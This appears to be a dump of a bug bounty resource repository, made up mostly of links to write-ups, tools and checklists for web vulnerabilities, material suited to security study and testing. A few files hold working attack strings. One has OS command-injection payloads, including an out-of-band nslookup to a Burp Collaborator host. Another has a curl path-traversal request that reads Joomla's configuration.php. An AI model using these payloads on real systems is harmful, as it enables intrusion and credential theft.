├── Wordlist-List ├── Os command injection ├── Headers_List.md ├── Admin access Subdomains ├── Admin access Endpoint ├── WordPress wordlist ├── github-wordlist-link.md └── Wordlist for Secret Find secret in js and github ├── Nosql.md ├── ICMP Attacks.md ├── Email_Injection.md ├── web-shell.md ├── Auto-Recon.md ├── Laravel-RCE.md ├── LFI.md ├── Nmap.md ├── SAML.md ├── API_KEYS.md ├── Command-Injection.md ├── Nuclei_Templates.md ├── Scripting.md ├── Technologies ├── Jenkins.md ├── Symfony.md ├── Azure.md └── Grafana.md ├── JIRA-exploit-resources.md ├── Nginx.md ├── Source_code_leaker.md ├── WAF.md ├── Cache_poisioning.md ├── Subdomain_Takeover.md ├── Dorks.md ├── HTTP-method-testing.md ├── signUp-page.md ├── Hunting-on-aspx-application.md ├── Redirection-Response.md ├── Reflection-IN-Header.md ├── Interaction-File-URL.md ├── README.md ├── Secondary-Contexts.md ├── Authorization-Response.md ├── Crawlers_to_Find_juicy_stuff.md ├── identify what something is.md ├── CORS.md ├── Login_page.md ├── Privilege-Esclation.md ├── SSO.md ├── File_Generation.md ├── MY-Recon.md ├── Dorks ├── TravisCI.md ├── SearchEngine.md └── GitHub-Dorks.md ├── Create edit remove ORG checklist.md ├── Sensitive-Data-in-Response.md ├── Setting-page-Checklist.md ├── phpinfo_page.md ├── Adding email checklist.md ├── CSP.md ├── Interesting_Params.md ├── Price_Manipulation.md ├── Burp.md ├── Payloads └── os command injection ├── 403-Bypass.md ├── Dependency_confusion.md ├── Get-into-BugBounty.md ├── Broken_link_hijacking.md ├── Contact-support-page.md ├── Shopping-Application.md ├── XML-Body.md ├── email-verification.md ├── DNS-misconfiguration.md ├── Prototype-Polution.md ├── CSV-Injection.md ├── Java.md ├── Firebase-Databas-Takeover.md ├── Path-Traversal.md ├── reset-password.md ├── Graphql.md ├── 2FA.md ├── Subdomain Enumeration.md ├── CMS ├── Joomla.md └── WordPress.md ├── Authentication_Bypass.md ├── Checklist.md ├── JWT.md ├── Cross-Site WebSocket Hijack.md ├── Fuzzing.md ├── Bug-Bounty-Tips.md ├── Hidden_Param_Finder.md ├── CSRF.md ├── AEM (Adobe Experience Manager) webapps.md ├── HTTP-Request-Smuggling.md ├── SSTI.md ├── RCE.md ├── API_Security.md ├── Practice Resources.md ├── Cookie-Vulnerabilities.md ├── Account_Takeover.md ├── IDOR.md ├── SQL-Injection.md ├── OAuth-Vulnerability.md ├── WriteUps.md ├── AWS-Pen-Testing.md ├── Wordlist.md ├── File-Upload.md ├── BugBounty-all-payload-Resource.md ├── JS-analysis.md ├── Misc └── Homoglyph.md ├── S3_Recon.md ├── Reconnaissance.md ├── tools.md ├── SSRF.md ├── XSS.md ├── CVES.md └── DOS.md /Wordlist-List/Os command injection: -------------------------------------------------------------------------------- 1 | /cgi-bin/parameter=payload 2 | -------------------------------------------------------------------------------- /Nosql.md: -------------------------------------------------------------------------------- 1 | ## 2 | http://ghostlulz.com/nosql-injection/ 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /ICMP Attacks.md: -------------------------------------------------------------------------------- 1 | ## https://resources.infosecinstitute.com/topic/icmp-attacks/ 2 | -------------------------------------------------------------------------------- /Email_Injection.md: -------------------------------------------------------------------------------- 1 | https://pentestbook.six2dez.com/enumeration/web/email-attacks 2 | -------------------------------------------------------------------------------- /web-shell.md: -------------------------------------------------------------------------------- 1 | ## 1. 2 | https://github.com/tennc/webshell/blob/master/README_EN.md 3 | -------------------------------------------------------------------------------- /Auto-Recon.md: -------------------------------------------------------------------------------- 1 | ## Rengine 2 | https://github.com/yogeshojha/rengine#quick-installation 3 | -------------------------------------------------------------------------------- /Laravel-RCE.md: -------------------------------------------------------------------------------- 1 | https://infosecwriteups.com/rce-on-a-laravel-private-program-2fb16cfb9f5c 2 | -------------------------------------------------------------------------------- /LFI.md: -------------------------------------------------------------------------------- 1 | ## 2 | https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Nmap.md: -------------------------------------------------------------------------------- 1 | ## Nmap NSE Library 2 | https://www.infosecmatter.com/nmap-nse-library/ 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /SAML.md: -------------------------------------------------------------------------------- 1 | ## 2 | https://www.cyberick.com/post/xxe-in-saml-sso-writeup-bug-bounty 3 | 4 | 5 | -------------------------------------------------------------------------------- /API_KEYS.md: -------------------------------------------------------------------------------- 1 | ## Firebase Cloud Messaging Service Takeover 2 | https://abss.me/posts/fcm-takeover/ 3 | 4 | -------------------------------------------------------------------------------- /Command-Injection.md: -------------------------------------------------------------------------------- 1 | ## Tool for OS command injection 2 | https://github.com/commixproject/commix 3 | 4 | -------------------------------------------------------------------------------- /Wordlist-List/Headers_List.md: -------------------------------------------------------------------------------- 1 | https://github.com/fullhunt/log4j-scan/blob/master/headers-large.txt 2 | 3 | 4 | -------------------------------------------------------------------------------- /Nuclei_Templates.md: -------------------------------------------------------------------------------- 1 | ## Nuclei Templates: 2 | 3 | https://github.com/NitinYadav00/My-Nuclei-Templates 4 | 5 | 6 | -------------------------------------------------------------------------------- /Scripting.md: -------------------------------------------------------------------------------- 1 | ## Oneliner Script 2 | https://github.com/dwisiswant0/awesome-oneliner-bugbounty#pure-bash-linkfinder 3 | -------------------------------------------------------------------------------- /Technologies/Jenkins.md: -------------------------------------------------------------------------------- 1 | ## Notes about attacking Jenkins servers 2 | https://github.com/gquere/pwn_jenkins 3 | 4 | -------------------------------------------------------------------------------- /Wordlist-List/Admin access Subdomains: -------------------------------------------------------------------------------- 1 | dev 2 | stag 3 | admin 4 | internal 5 | stag-dev 6 | stag-admin 7 | internal-dev 8 | -------------------------------------------------------------------------------- /JIRA-exploit-resources.md: -------------------------------------------------------------------------------- 1 | ## JIRA cve exploits 2 | https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c 3 | 4 | -------------------------------------------------------------------------------- /Nginx.md: -------------------------------------------------------------------------------- 1 | ## Nginxpwner Tool 2 | https://www.kitploit.com/2021/05/nginxpwner-tool-to-look-for-common.html?m=1 3 | 4 | ## 5 | -------------------------------------------------------------------------------- /Source_code_leaker.md: -------------------------------------------------------------------------------- 1 | ## 2 | https://www.kitploit.com/2021/12/sourceleakhacker-multi-threads-web.html?m=1 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /WAF.md: -------------------------------------------------------------------------------- 1 | ## Everything about web-application firewalls (WAF) 2 | https://github.com/0xInfection/Awesome-WAF 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Cache_poisioning.md: -------------------------------------------------------------------------------- 1 | ## 2 | https://youst.in/posts/cache-poisoning-at-scale/ 3 | 4 | ## 5 | https://bxmbn.medium.com/ 6 | 7 | 8 | -------------------------------------------------------------------------------- /Wordlist-List/Admin access Endpoint: -------------------------------------------------------------------------------- 1 | /dev/register/ 2 | /stag/register/ 3 | /dev/login/ 4 | /register/ 5 | /internal/ 6 | /stag/ 7 | -------------------------------------------------------------------------------- /Subdomain_Takeover.md: -------------------------------------------------------------------------------- 1 | ## NtHiM - Super Fast Sub-domain Takeover Detection 2 | https://github.com/TheBinitGhimire/NtHiM 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Dorks.md: -------------------------------------------------------------------------------- 1 | ## dorks 2 | https://github.com/cipher387/Dorks-collections-list 3 | 4 | ## github dorks helper 5 | https://vsec7.github.io/ 6 | 7 | -------------------------------------------------------------------------------- /HTTP-method-testing.md: -------------------------------------------------------------------------------- 1 | ## 1. Http method testing by owasp 2 | 3 | https://wiki.owasp.org/index.php/Test_HTTP_Methods_(OTG-CONFIG-006) 4 | 5 | -------------------------------------------------------------------------------- /Technologies/Symfony.md: -------------------------------------------------------------------------------- 1 | ## EOS loots information from a Symfony target in debug mode 2 | https://github.com/Synacktiv/eos 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /signUp-page.md: -------------------------------------------------------------------------------- 1 | https://docs.google.com/presentation/d/17Qexwb7Way19ou-9X3wgKpFx0bXLLLNVIiNK8pNaolI/mobilepresent?slide=id.ga9d77201d5_0_156 2 | 3 | -------------------------------------------------------------------------------- /Hunting-on-aspx-application.md: -------------------------------------------------------------------------------- 1 | ## 1. Hunting on ASPX Application For P1's [Unauthenticated SOAP,RCE, Info Disclosure] 2 | https://0u.ma/m/3 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Redirection-Response.md: -------------------------------------------------------------------------------- 1 | https://docs.google.com/presentation/d/1Ee0w3-7fBpxD5hM17fxb-SA1r1WpHKpB8R0lNgSGXyk/mobilepresent?slide=id.gaf8ff68377_0_328 2 | 3 | -------------------------------------------------------------------------------- /Reflection-IN-Header.md: -------------------------------------------------------------------------------- 1 | https://docs.google.com/presentation/d/1K8SKqggVwuzarTiKSf6VUBsGX9zpZqjGQkr2XxXpLWo/mobilepresent?slide=id.gb4f8bdb222_0_0 2 | 3 | -------------------------------------------------------------------------------- /Wordlist-List/WordPress wordlist: -------------------------------------------------------------------------------- 1 | wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=xml 2 | wp-admin/setup-config.php?step=1 3 | -------------------------------------------------------------------------------- /Interaction-File-URL.md: -------------------------------------------------------------------------------- 1 | https://docs.google.com/presentation/d/1sfitPjqr7b6RBKeJa-qgjcJ3lp3oCdiM0JBNznAGh7A/mobilepresent?slide=id.gb88a89362b_0_78 2 | 3 | 4 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Bug Bounty Resources 2 | 3 | Bug Bounty Writeups and exploit's resource 4 | 5 | 6 | 7 | 8 | 9 | **Use it only for ethical purpose** 10 | -------------------------------------------------------------------------------- /Secondary-Contexts.md: -------------------------------------------------------------------------------- 1 | ## 2 | https://docs.google.com/presentation/d/1jqnpPe0A7L_cVuPe1V0XeW6LOHvMYg5PBqHd96SScJ8/mobilepresent?slide=id.gb78d501c4d_0_312 3 | 4 | -------------------------------------------------------------------------------- /Technologies/Azure.md: -------------------------------------------------------------------------------- 1 | ## XMGoat – An Open Source Pentesting Tool for Azure 2 | https://www.xmcyber.com/xmgoat-an-open-source-pentesting-tool-for-azure/ 3 | 4 | -------------------------------------------------------------------------------- /Authorization-Response.md: -------------------------------------------------------------------------------- 1 | ## 1. 2 | https://docs.google.com/presentation/d/1ek6DzXKBQd6xUiVNGRT33pMACs8M13CSoYCkgepDKZk/mobilepresent?slide=id.gb2a807bdfd_0_0 3 | 4 | -------------------------------------------------------------------------------- /Crawlers_to_Find_juicy_stuff.md: -------------------------------------------------------------------------------- 1 | ## Amazingly fast response crawler to find juicy stuff in the source code! 2 | https://github.com/ksharinarayanan/SourceWolf 3 | 4 | -------------------------------------------------------------------------------- /identify what something is.md: -------------------------------------------------------------------------------- 1 | ### Identify anything. pyWhat easily lets you identify emails, IP addresses, and more 2 | https://github.com/bee-san/pywhat 3 | 4 | 5 | -------------------------------------------------------------------------------- /CORS.md: -------------------------------------------------------------------------------- 1 | ## If HttpOnly You Could Still CSRF… Of CORS you can! 2 | https://medium.com/@_graphx/if-httponly-you-could-still-csrf-of-cors-you-can-5d7ee2c7443 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Login_page.md: -------------------------------------------------------------------------------- 1 | ## 1. Login page checklist 2 | https://docs.google.com/presentation/d/1lGMRCYJo9d66A3rIVNbTk3thn76uc9Gyp8Gpu9mZHQ8/mobilepresent?slide=id.gac49ca7b44_0_158 3 | -------------------------------------------------------------------------------- /Privilege-Esclation.md: -------------------------------------------------------------------------------- 1 | ## 1. 2 | https://docs.google.com/presentation/d/1IOw1CVKw15ZW0fUUot0j5eUIepE_NGBybWf92Y9AtMg/mobilepresent?slide=id.gd438d330c0_0_318 3 | 4 | 5 | -------------------------------------------------------------------------------- /SSO.md: -------------------------------------------------------------------------------- 1 | ## 1. SSO Checklist 2 | 3 | https://docs.google.com/presentation/d/1bxBL0HyL8pbDUsa00abfbfEoawmx-XsVIkUjF_V2-_I/mobilepresent?slide=id.gaa585d4e81_0_156 4 | 5 | -------------------------------------------------------------------------------- /File_Generation.md: -------------------------------------------------------------------------------- 1 | ## File Generation 2 | https://docs.google.com/presentation/d/1m4DbtZ3HjU43xeXsEdOJIGe-pkwowH87fsxBS1QK7_4/mobilepresent?slide=id.gb3c7f3a5f1_0_156 3 | 4 | -------------------------------------------------------------------------------- /MY-Recon.md: -------------------------------------------------------------------------------- 1 | ## Subdomain enumeration 2 | subfinder -d domain.com -o file1.txt 3 | assetfinder domain.com -o file2.txt 4 | amass enum -d domain.com | teee -a file3.txt 5 | 6 | -------------------------------------------------------------------------------- /Dorks/TravisCI.md: -------------------------------------------------------------------------------- 1 | ## 1. Automation for fetches repos, builds, and logs for any given organization from TravisCI 2 | ``` 3 | https://github.com/lc/secretz 4 | ``` 5 | ## 2. 6 | 7 | -------------------------------------------------------------------------------- /Wordlist-List/github-wordlist-link.md: -------------------------------------------------------------------------------- 1 | 2 | ## 1.collection of wordlist 3 | https://github.com/heilla/SecurityTesting/blob/master/wordlists/Collection%20of%20wordlists.md 4 | 5 | 6 | -------------------------------------------------------------------------------- /Create edit remove ORG checklist.md: -------------------------------------------------------------------------------- 1 | ## Checklist 2 | 3 | https://docs.google.com/presentation/d/1E5zjGcnqSe7asDreGPgBS2T-bAJ5siuE0QKvJnX91Cw/mobilepresent?slide=id.ge2f51227b3_0_158 4 | -------------------------------------------------------------------------------- /Sensitive-Data-in-Response.md: -------------------------------------------------------------------------------- 1 | ## Sensitive Data in Response 2 | https://docs.google.com/presentation/d/18Megn0BLxRd3_gzzhiPN1nlZ1TB8hVckAUJcRhRZqSE/mobilepresent?slide=id.gb16bd8c8c4_0_477 3 | -------------------------------------------------------------------------------- /Setting-page-Checklist.md: -------------------------------------------------------------------------------- 1 | ## 1. Settings page checklist 2 | 3 | https://docs.google.com/presentation/d/11Aa5PkGswQdZo3sLYbB8PAFfgGLocDpRujaGf5v6g70/mobilepresent?slide=id.gae8ab10c68_0_156 4 | -------------------------------------------------------------------------------- /phpinfo_page.md: -------------------------------------------------------------------------------- 1 | ## From phpinfo page to many P1 bugs and RCE. [Symfony] 2 | https://u-itachi.medium.com/from-phpinfo-page-to-many-p1-bugs-and-rce-symfony-bce432605662 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /Adding email checklist.md: -------------------------------------------------------------------------------- 1 | ## Adding email checklist 2 | https://docs.google.com/presentation/d/18EROY7aLfy6omx3-KTjUnAfOuh3UP5UiAnSc__uuRV4/mobilepresent?slide=id.ge49d443037_0_310 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /CSP.md: -------------------------------------------------------------------------------- 1 | ## Exploiting CSP in Webkit to Break Authentication & Authorization 2 | https://threatnix.io/blog/exploiting-csp-in-webkit-to-break-authentication-authorization/ 3 | 4 | 5 | 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /Dorks/SearchEngine.md: -------------------------------------------------------------------------------- 1 | ## 1. Search Engine dorks 2 | ``` 3 | https://docs.google.com/presentation/d/1dBXWUFKXa6gWQNCifN939Wf1ZNTIELlRZ4FhcaHvSOE/mobilepresent?slide=id.gce482a8cc4_0_310 4 | ``` 5 | 6 | -------------------------------------------------------------------------------- /Interesting_Params.md: -------------------------------------------------------------------------------- 1 | ## For basic researches, top 25 vulnerability parameters that can be used in automation tools or manual recon 2 | https://github.com/lutfumertceylan/top25-parameter 3 | 4 | 5 | -------------------------------------------------------------------------------- /Price_Manipulation.md: -------------------------------------------------------------------------------- 1 | ## Price Manipulation Bypass Using Integer Overflow Method 2 | https://marxchryz.medium.com/price-manipulation-bypass-using-integer-overflow-method-36ff23ebe91d 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Burp.md: -------------------------------------------------------------------------------- 1 | ## Burp Suite for Pentester: Software Vulnerability Scanner & Retire.js 2 | https://www.hackingarticles.in/burp-suite-for-pentester-software-vulnerability-scanner/ 3 | 4 | 5 | 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /Payloads/os command injection: -------------------------------------------------------------------------------- 1 | |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1 2 | |nslookup -q=cname my.burpcollaborator.net.& 3 | -------------------------------------------------------------------------------- /403-Bypass.md: -------------------------------------------------------------------------------- 1 | ## 403 Forbidden Bypass 2 | 3 | https://dewangpanchal98.medium.com/403-forbidden-bypass-fc8b5df109b7 4 | 5 | ## bypassing 403 6 | https://github.com/iamj0ker/bypass-403 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /Dependency_confusion.md: -------------------------------------------------------------------------------- 1 | ## 2 | https://hetroublemakr.medium.com/how-i-approached-dependency-confusion-272b46f66907 3 | 4 | ## 5 | https://dhiyaneshgeek.github.io/web/security/2021/09/04/dependency-confusion/ 6 | -------------------------------------------------------------------------------- /Get-into-BugBounty.md: -------------------------------------------------------------------------------- 1 | ## Vickie Li writeup 2 | 3 | https://medium.com/swlh/mastering-the-skills-of-bug-bounty-2201eb6a9f4 4 | 5 | ## 6 | https://githubhelp.com/jandersoncampelo/InfosecBookmarks 7 | 8 | 9 | -------------------------------------------------------------------------------- /Broken_link_hijacking.md: -------------------------------------------------------------------------------- 1 | ## Broken Link Hijacking — 404 Google Play Store— xxx$ Bounty 2 | https://proviesec.medium.com/broken-link-hijacking-404-google-play-store-xxx-bounty-96e79a8dfd71 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /Contact-support-page.md: -------------------------------------------------------------------------------- 1 | ## 1. Target Contact page tips 2 | ``` 3 | https://docs.google.com/presentation/d/1wqx9fnr9v451FHdU33XeXBIg3b_pfhF9X0ttkydrGlk/mobilepresent?slide=id.gb07b8690e7_0_156 4 | ``` 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /Shopping-Application.md: -------------------------------------------------------------------------------- 1 | ## 1. Vulnerabilities in shopping application 2 | ``` 3 | https://docs.google.com/presentation/d/1yMLYZbjERTeojwjve7Yh6Pojvljnl0UVAKTY9i-ZaSE/mobilepresent?slide=id.gb240823d22_0_155 4 | ``` 5 | -------------------------------------------------------------------------------- /XML-Body.md: -------------------------------------------------------------------------------- 1 | ## XML-Body 2 | https://docs.google.com/presentation/d/1bCODG8WGPvsCNOBFXRNh3RrQTfFeoVrP5FxrptGm7AA/mobilepresent?slide=id.gb53efb3cea_0_0 3 | 4 | ## 5 | https://gosecure.github.io/xxe-workshop/#2 6 | 7 | -------------------------------------------------------------------------------- /email-verification.md: -------------------------------------------------------------------------------- 1 | ## 1. 2 | https://infosecwriteups.com/email-verification-bypass-a-strange-case-f38291866126 3 | 4 | ## 2. Email bounce 5 | https://infosecwriteups.com/an-unexpected-bounty-email-bounce-issues-b9f24a35eb68 6 | -------------------------------------------------------------------------------- /DNS-misconfiguration.md: -------------------------------------------------------------------------------- 1 | ## Dns misconfig details 2 | https://resources.infosecinstitute.com/topic/dns-hacking/ 3 | 4 | ## Misconfigure Zone transfer 5 | https://www.cybrary.it/blog/0p3n/find-dns-zone-transfer-misconfiguration/ 6 | 7 | -------------------------------------------------------------------------------- /Prototype-Polution.md: -------------------------------------------------------------------------------- 1 | ## Tool 2 | https://github.com/raverrr/plution 3 | 4 | ## fast tool to scan client-side prototype pollution vulnerability written in Rust. 5 | https://github.com/dwisiswant0/ppfuzz 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /CSV-Injection.md: -------------------------------------------------------------------------------- 1 | ## Bug in Export to Spreadsheet functionality in web applications 2 | 3 | ## 1. Details 4 | https://www.contextis.com/en/blog/comma-separated-vulnerabilities 5 | 6 | ## 2. Hackerone Report 7 | https://hackerone.com/reports/928280 8 | -------------------------------------------------------------------------------- /Java.md: -------------------------------------------------------------------------------- 1 | ## 1. Java Deserialization scanner 2 | https://github.com/joaomatosf/jexboss 3 | 4 | ## 2. Common vulnerabilities in Java and how to fix them 5 | https://blog.shiftleft.io/common-vulnerabilities-in-java-and-how-to-fix-them-fe69e859b262 6 | 7 | -------------------------------------------------------------------------------- /Firebase-Databas-Takeover.md: -------------------------------------------------------------------------------- 1 | ## Firebase Database Takeover 2 | https://danangtriatmaja.medium.com/firebase-database-takover-b7929bbb62e1 3 | 4 | ## 5 | https://medium.com/@fs0c131y/how-i-found-the-database-of-the-donald-daters-app-af88b06e39ad 6 | 7 | -------------------------------------------------------------------------------- /Path-Traversal.md: -------------------------------------------------------------------------------- 1 | ## ASP .Net path traversal 2 | https://alaa0x2.medium.com/asp-net-core-path-traversal-e2bed792d171 3 | 4 | ## Bypassing LFI (Local File Inclusion) 5 | https://medium.com/@abhishake21/bypassing-lfi-local-file-inclusion-ebf4274e7027 6 | 7 | -------------------------------------------------------------------------------- /reset-password.md: -------------------------------------------------------------------------------- 1 | ## 2 | https://docs.google.com/presentation/d/1QzBl3k3n2q44ULyfZgr_gPZexj8nF5vD8JrS5AUJRbs/mobilepresent?slide=id.gac68916404_0_19 3 | 4 | ## 10 Password Reset Flaws 5 | https://anugrahsr.github.io/posts/10-Password-reset-flaws/ 6 | 7 | 8 | -------------------------------------------------------------------------------- /Graphql.md: -------------------------------------------------------------------------------- 1 | ## Exploiting graphql 2 | https://blog.assetnote.io/2021/08/29/exploiting-graphql/ 3 | 4 | ## garphql abuse 5 | https://labs.detectify.com/2018/03/14/graphql-abuse/ 6 | 7 | ## 8 | https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application 9 | 10 | -------------------------------------------------------------------------------- /2FA.md: -------------------------------------------------------------------------------- 1 | ## 1. 2fa bypass technique 2 | https://www.mindmeister.com/1736437018?t=SEeZOmvt01 3 | 4 | ## 2. Two-factor authentication security testing and possible bypasses 5 | https://medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35 6 | -------------------------------------------------------------------------------- /Subdomain Enumeration.md: -------------------------------------------------------------------------------- 1 | ## 1. DNS subdomain scanner 2 | https://github.com/rbsec/dnscan 3 | 4 | 5 | ## 2. Subdomain Enumeration 6 | https://sidxparab.gitbook.io/subdomain-enumeration-guide/introduction/whats-the-need 7 | 8 | ## 3. 9 | https://github.com/screetsec/Sudomy 10 | -------------------------------------------------------------------------------- /CMS/Joomla.md: -------------------------------------------------------------------------------- 1 | ## Joomla! component com_jssupportticket - Arbitrary File Download 2 | https://www.exploitalert.com/view-details.html?id=33803 3 | ``` 4 | curl -X GET -i "http://localhost/index.php?option=com_jssupportticket&c=ticket&task=downloadbyname&id=0&name=../../../configuration.php" 5 | ``` 6 | -------------------------------------------------------------------------------- /Authentication_Bypass.md: -------------------------------------------------------------------------------- 1 | ## Authentication Bypass | Easy P1 in 10 minutes 2 | https://infosecwriteups.com/authentication-bypass-easy-p1-in-10-minutes-54d5a2093e54 3 | 4 | 5 | ## Authentication bypass using root array 6 | https://infosecwriteups.com/authentication-bypass-using-root-array-4a179242b9f7 7 | 8 | -------------------------------------------------------------------------------- /Dorks/GitHub-Dorks.md: -------------------------------------------------------------------------------- 1 | ## 1. Github Dorks 2 | ``` 3 | https://docs.google.com/presentation/d/1lqBriLkclVwCi4q_VhJUXa-GYehLsMp054PzN4qrTn8/mobilepresent?slide=id.g9e14b666d8_0_147 4 | ``` 5 | ## 2. Automation for found high entropy string in git repo 6 | ``` 7 | https://github.com/trufflesecurity/truffleHog 8 | `` 9 | 10 | 11 | -------------------------------------------------------------------------------- /Checklist.md: -------------------------------------------------------------------------------- 1 | ## Pentesting Web checklist 2 | https://pentestbook.six2dez.com/others/web-checklist 3 | 4 | ## 5 | https://github.com/coreb1t/awesome-pentest-cheat-sheets 6 | 7 | ## 8 | https://github.com/riramar/Web-Attack-Cheat-Sheet 9 | 10 | ## 11 | https://cheatsheet.haax.fr/web-pentest/resources-discovery/ 12 | 13 | 14 | -------------------------------------------------------------------------------- /JWT.md: -------------------------------------------------------------------------------- 1 | ## 1. JWT automated vulnerability scanner 2 | ``` 3 | https://hackerone.com/reports/993582?__cf_chl_jschl_tk__=pmd_d4edfa2689d4773535bd4991c5ac1b735467eca6-1628409964-0-gqNtZGzNAeKjcnBszQ0O 4 | ``` 5 | 6 | ## 2. Vulnerability in jwt encryption 7 | https://auth0.com/blog/critical-vulnerability-in-json-web-encryption/ 8 | 9 | 10 | -------------------------------------------------------------------------------- /Cross-Site WebSocket Hijack.md: -------------------------------------------------------------------------------- 1 | ## Cross-Site WebSocket Hijack 2 | https://github.com/DeepakPawar95/cswsh 3 | 4 | ## 5 | https://sunilyedla.medium.com/websocket-hijacking-to-steal-session-id-of-victim-users-bca84243830 6 | 7 | ## Peeping through a Web-Socket 8 | https://cirius.medium.com/peeping-through-a-web-socket-936ed55a2c31 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | -------------------------------------------------------------------------------- /Fuzzing.md: -------------------------------------------------------------------------------- 1 | ## collection of Burpsuite Intruder payloads, BurpBounty payloads, fuzz lists, malicious file uploads and web pentesting methodologies and checklists 2 | https://github.com/1N3/IntruderPayloads 3 | 4 | ## A complete guide to dir brute force,admin panel and API endpoints 5 | https://github.com/emadshanab/Acomplete-guide-to-dir-brute-force-admin-panel-and-API-endpoints 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /Bug-Bounty-Tips.md: -------------------------------------------------------------------------------- 1 | ## 1. Bug bounty tips by @punishell 2 | https://github.com/punishell/bbtips 3 | 4 | ## 2. Vulnerability approach by aditya shende 5 | https://github.com/kongsec/Vulnerabilities-Approach-Slides/blob/main/Book_of_tips_by_aditya_shende.pdf 6 | 7 | ## 3. How i hacked BBC mail servers 8 | https://cyberguy0xd1.medium.com/how-i-hacked-bbc-mail-servers-e61bb6faed2d 9 | 10 | ## 4. Bug Bounty Tips #5 11 | https://www.infosecmatter.com/bug-bounty-tips-5-aug-17/ 12 | 13 | 14 | -------------------------------------------------------------------------------- /Hidden_Param_Finder.md: -------------------------------------------------------------------------------- 1 | ## Hidden parameters discovery suite 2 | https://github.com/Sh1Yo/x8 3 | 4 | ## This tool finds hidden endpoints, especially on APIs. It fetches JSON responses from BurpSuite history and creates url-paths wordlist from JSON keys. 5 | https://github.com/s0md3v/dump/tree/master/json2paths 6 | 7 | ## Params — Discovering Hidden Treasure in WebApps 8 | https://medium.com/geekculture/params-discovering-hidden-treasure-in-webapps-b4a78509290f 9 | 10 | 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /CSRF.md: -------------------------------------------------------------------------------- 1 | ## CSRF in json request 2 | https://hacklido.com/blog/449-json-csrf-csrf-that-none-talks-about 3 | 4 | ## CSRF combined with JSON type confusion 5 | https://blog.azuki.vip/csrf/ 6 | 7 | ## How I was able to delete anyone’s account in an Online Car Rental Company 8 | https://infosecwriteups.com/bugbounty-how-i-was-able-to-delete-anyones-account-in-an-online-car-rental-company-8a4022cc611 9 | 10 | ## 11 | https://infosecwriteups.com/story-of-a-weird-csrf-bug-bde1129c106e 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /AEM (Adobe Experience Manager) webapps.md: -------------------------------------------------------------------------------- 1 | ## AEM applications Vulnerabilities 2 | https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=9 3 | 4 | ## How I found my first AEM related bug 5 | https://infosecwriteups.com/how-i-found-my-first-aem-related-bug-5ea901aad3f4 6 | 7 | ## Quick wins with Adobe Experience Manager 8 | https://www.pentestpartners.com/security-blog/quick-wins-with-adobe-experience-manager/ 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | -------------------------------------------------------------------------------- /HTTP-Request-Smuggling.md: -------------------------------------------------------------------------------- 1 | ## 1. 2 | https://docs.google.com/presentation/d/1DV-VYkoEsjFsePPCmzjeYjMxSbJ9PUH5EIN2ealhr5I/mobilepresent?slide=id.gc72dc9a11a_0_310 3 | 4 | ## 2. Practical HTTP Header Smuggling: Sneaking Past Reverse Proxies to Attack AWS and Beyond 5 | https://www.intruder.io/research/practical-http-header-smuggling 6 | 7 | ## 3. How to set up Docker for Varnish HTTP/2 request smuggling 8 | https://labs.detectify.com/2021/08/26/how-to-set-up-docker-for-varnish-http-2-request-smuggling/ 9 | 10 | 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /SSTI.md: -------------------------------------------------------------------------------- 1 | ## 1. portswigger SSTI 2 | https://portswigger.net/web-security/server-side-template-injection 3 | 4 | ## 2. 5 | https://verneet.com/fuzzing-77-till-p1/ 6 | 7 | ## 3. 8 | https://gauravnarwani.com/injecting-6200-to-1200/ 9 | 10 | 11 | ## 4. SSTI wordlist for fuzzing 12 | https://github.com/err0rr/SSTI/blob/master/Wordlist 13 | 14 | 15 | ## 5. 16 | https://verneet.com/fuzzing-77-till-p1/ 17 | 18 | ## 6. limited freemarker ssti to arbitrary liql query and manage lithium cms 19 | https://blog.mert.ninja/freemarker-ssti-on-lithium-cms/ 20 | 21 | -------------------------------------------------------------------------------- /RCE.md: -------------------------------------------------------------------------------- 1 | ## Pre-Auth RCE in Moodle Part II - Session Hijack in Moodle's Shibboleth 2 | https://haxolot.com/posts/2022/moodle_pre_auth_shibboleth_rce_part2/ 3 | 4 | ## An Unauthenticated RCE Vulnerability In MovableType / CVE-2021–20837 5 | https://medium.com/@TutorialBoy24/an-unauthenticated-rce-vulnerability-in-movabletype-cve-2021-20837-70664b159dd7 6 | 7 | ## 8 | https://machevalia.blog/remote-code-execution-in-tgz-file-upload/ 9 | 10 | ## 11 | https://medium.com/manomano-tech/the-tale-of-a-click-leading-to-rce-8f68fe93545d 12 | 13 | 14 | 15 | 16 | 17 | 18 | -------------------------------------------------------------------------------- 